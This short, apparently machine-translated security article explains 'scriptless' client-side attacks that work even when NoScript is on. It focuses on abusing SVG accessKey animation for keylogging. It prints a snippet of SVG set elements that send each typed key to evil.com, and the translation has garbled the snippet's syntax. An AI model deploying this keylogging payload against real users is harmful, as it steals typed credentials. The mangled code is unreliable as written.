No Script attack on the client (Scriptless Attacks)

As the security awareness and technical level of enterprises continue to improve, attacks on servers become more and more difficult. Over the years, hackers have paid more and more attention to the use of client attack technologies and cross-site scripting (XSS) attacks) it is one of the most widely used technologies. To prevent similar attacks, security agencies have developed various methods to detect malicious scripts. Firefox even launched the NoScript plug-in to completely prevent client scripts from running (unless explicitly authorized by the client ). Recently, foreign researchers have proposed the Scriptless Attacks (client-side scripting) technology, attackers can also steal sensitive personal information such as client accounts and passwords. The emergence of this new attack technology immediately aroused the strong interest of security personnel. Then, how can an attacker perform an attack when the client completely disallows the script to run? In fact, this is related to the increasingly rich features of browsers. For example, SVG Scalable Vector Graphics is a Scalable markup language (XML) proposed by W3C, an international Internet standard organization. It is used to describe two-dimensional Vector Graphics. SVG can be used to generate and process images through text, which greatly improves the interaction and dynamic effect of browsers when processing image information. Accesskey is an operation function defined in SVG. This function is triggered when the browser captures the key information. It is intended to provide a convenient way to operate images, attackers can easily achieve malicious key logging. The following is part of the code snippet that implements the key record. http://web2hack.org/blog/?p=89 : <Set attributeName = "xlink: href" begin = "accessKey (a)" to = "// evil.com /? A "/> <set attributeName =" xlink: href "begin =" accessKey (B) "to =" // evil.com /? B "/> <set attributeName =" xlink: href "begin =" accessKey (c) "to =" // www.2cto.com /? C "/> <set attributeName =" xlink: href "begin =" accessKey (d) "to =" // evil.com /? D "/> the above is only a typical example of No-Script attack. Attackers can also use various CSS-based special effects to perform more attacks. Due to space limitations, they will not be described here.